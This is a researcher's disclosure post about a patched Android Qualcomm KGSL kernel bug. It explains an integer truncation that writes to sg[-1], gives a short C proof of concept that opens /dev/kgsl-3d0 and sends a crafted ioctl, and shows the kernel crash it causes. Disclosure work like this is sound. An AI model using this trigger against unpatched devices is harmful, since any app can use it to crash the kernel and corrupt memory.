Retme的未来道具研究所

世界線の収束には、逆らえない

This issue has been released in the June 2016 Nexus public bulletin.

https://source.android.com/security/bulletin/2016-06-01.html#acknowledgements


Technical Detail:

In _kgsl_sharedmem_page_alloc,if the low 32bit part of 'size' > 0x80000000,variable 'len' will be a negative number.

Then it will not enter the while loop and reach 'sg_mark_end(&memdesc->sg[sglen - 1]);'

Note that variable 'sglen' is zero, so the mark will be set on the address 'memdesc->sg[-1]'. 


static int
_kgsl_sharedmem_page_alloc(struct kgsl_memdesc *memdesc,
            struct kgsl_pagetable *pagetable,
            size_t size)
{
    int ret = 0;
    int len, page_size, sglen_alloc, sglen = 0;
    unsigned int align;

    //...snip...

    len = size; 

    while (len > 0) {
        //...snip...
    }

    memdesc->sglen = sglen;
    memdesc->size = size;
    sg_mark_end(&memdesc->sg[sglen - 1]);







PoC:


void kgsl_poc(){
//kgsl_sharedmem_page_alloc_user

  int fd = open("/dev/kgsl-3d0",0);

  struct kgsl_gpumem_alloc_id arg;

  arg.flags = 0;
  arg.size = 0xa18fb010b0c08000;

  ioctl(fd,IOCTL_KGSL_GPUMEM_ALLOC_ID, &arg);
}
int main(int argc, char *argv[]) {
  kgsl_poc();

  return 0;
}





crash :


<1>[  112.913308] Unable to handle kernel paging request at virtual address ffffff800da40fe0
<1>[  112.913323] pgd = ffffffc0588a8000
<1>[  112.913328] [ffffff800da40fe0] *pgd=0000000000000000
<0>[  112.913339] Internal error: Oops: 96000007 [#1] PREEMPT SMP
<4>[  112.913350] CPU: 2 PID: 5511 Comm: 3636test Tainted: G        W    3.10.73-gda330d0 #1
<4>[  112.913356] task: ffffffc0b0600000 ti: ffffffc0946fc000 task.ti: ffffffc0946fc000
<4>[  112.913370] PC is at kgsl_sharedmem_page_alloc_user+0x1ec/0x268
<4>[  112.913376] LR is at kgsl_sharedmem_page_alloc_user+0xa8/0x268
<4>[  112.913382] pc : [<ffffffc000576b58>] lr : [<ffffffc000576a14>] pstate: a0000145
<4>[  112.913386] sp : ffffffc0946ffc10
<4>[  112.913390] x29: ffffffc0946ffc10 x28: ffffffc000000000 
<4>[  112.913398] x27: ffffffc000c9d000 x26: 0000000000001500 
<4>[  112.913406] x25: ffffffc000c9a000 x24: cccccccccccccccd 
<4>[  112.913415] x23: ffffffc001791bc0 x22: 00000000b0c08000 
<4>[  112.913423] x21: a18fb010b0c08000 x20: ffffffffffffffe0 
<4>[  112.913431] x19: ffffffc093255248 x18: 0000007f9b45c000 
<4>[  112.913439] x17: 0000007f9b309264 x16: ffffffc00030cf48 
<4>[  112.913447] x15: 0000000000000001 x14: 0000007f9b44e040 
<4>[  112.913454] x13: 00000000000000a0 x12: 0000000000000001 
<4>[  112.913462] x11: 0000000000000068 x10: 0140000000000000 
<4>[  112.913471] x9 : 0000000000000000 x8 : ffffff802f059100 
<4>[  112.913478] x7 : 0000000000000000 x6 : 000000000000003f 
<4>[  112.913486] x5 : 0000000000000040 x4 : 0000000000000000 
<4>[  112.913494] x3 : 0000000000000004 x2 : 0000000000000000 
<4>[  112.913502] x1 : ffffff800da41000 x0 : ffffffffffffffe0 
<4>[  112.913509] 
<0>[  112.913514] Process 3636test (pid: 5511, stack limit = 0xffffffc0946fc058)
<4>[  112.913519] Call trace:
<4>[  112.913526] [<ffffffc000576b58>] kgsl_sharedmem_page_alloc_user+0x1ec/0x268
<4>[  112.913535] [<ffffffc000569820>] _gpumem_alloc+0x150/0x1d0
<4>[  112.913543] [<ffffffc00056d424>] kgsl_ioctl_gpumem_alloc_id+0x30/0x180
<4>[  112.913550] [<ffffffc00056f704>] kgsl_ioctl_helper+0x220/0x2b8
<4>[  112.913558] [<ffffffc00056f7b8>] kgsl_ioctl+0x1c/0x28
<4>[  112.913566] [<ffffffc00030ce74>] do_vfs_ioctl+0x4a8/0x57c
<4>[  112.913573] [<ffffffc00030cfa4>] SyS_ioctl+0x5c/0x88
<0>[  112.913581] Code: d503201f 9b210294 f9402261 f9001a75 (f8746820) 


Any application can access device '/dev/kgsl-3d0'.That's why Android Sec Team set it to Critical severity.


patch:

https://android.googlesource.com/kernel/msm/+/fb17eb73640b869ed4920791af1dfd680026fd49%5E%21/#F0